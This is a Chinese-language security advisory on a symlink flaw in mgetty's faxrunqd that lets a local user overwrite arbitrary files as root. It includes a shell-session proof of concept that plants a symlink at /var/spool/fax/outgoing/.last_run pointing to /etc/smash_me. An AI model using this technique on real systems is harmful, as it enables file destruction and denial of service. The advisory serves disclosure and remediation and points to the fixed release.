Linux faxrunqd文件创建问题导致拒绝服务攻击
受影响系统:
mgetty 1.1.21以及更低版本
- Linux redhat 6.2以及更低版本
- Linux-Mandrake 7.1 以及更低版本
- 其他使用有问题mgetty的unix系统
不受影响系统:
mgetty 1.1.22
描述:
mgetty中带了一个faxrunqd程序,它用来发送faxspool(1)产生的传真队列中的任务。
在执行时,该程序会在/var/spool/outgoing/目录下创建一个.last_run文件,这个
目录是任何人可写的。在某些mgetty版本中所带的faxrunqd没有检查该文件是否存在
或是链接文件,因此攻击者可能覆盖任意系统文件,造成拒绝服务攻击。
<* 来源: Stan Bubrouski ([email protected])*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
[user@king /tmp]$ id
uid=200(user) gid=100(users) groups=100(users)
[user@king /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt 3 root root 1024 Jun 2 18:46 .
drwxr-xr-x 4 root root 1024 Jun 2 18:46 ..
drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks
[user@king /tmp]$ ls -al /etc/smash_me
-rw-r--r-- 1 root root 12 Jun 2 18:45 /etc/smash_me
[user@king /tmp]$ cat /etc/smash_me
Smash me!!!
[user@king /tmp]$ ln -s /etc/smash_me /var/spool/fax/outgoing/.last_run
[user@king /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt 3 root root 1024 Jun 2 18:48 .
drwxr-xr-x 4 root root 1024 Jun 2 18:46 ..
lrwxrwxrwx 1 user users 13 Jun 2 18:48 .last_run ->
/etc/smash_me
drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks
Root console:
[root@king /tmp]# faxrunqd -l ttyS0
...
Remote unprivilaged user:
[user@king /tmp]$ ls -al /var/spool/fax/outgoing
total 3
drwxrwxrwt 3 root root 1024 Jun 2 18:48 .
drwxr-xr-x 4 root root 1024 Jun 2 18:48 ..
lrwxrwxrwx 1 user users 13 Jun 2 18:48 .last_run ->
/etc/smash_me
drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks
[user@king /tmp]$ ls -al /etc/smash_me
-rw-r--r-- 1 root root 44 Jun 2 18:48 /etc/smash_me
[user@king /tmp]$ cat /etc/smash_me
Fri Jun 2 18:48:47 2000 /usr/sbin/faxrunqd
建议:
mgetty 1.1.22已经解决了这个问题,您可以在下列地址下载:
http://alpha.greenie.net/mgetty/
- 最新评论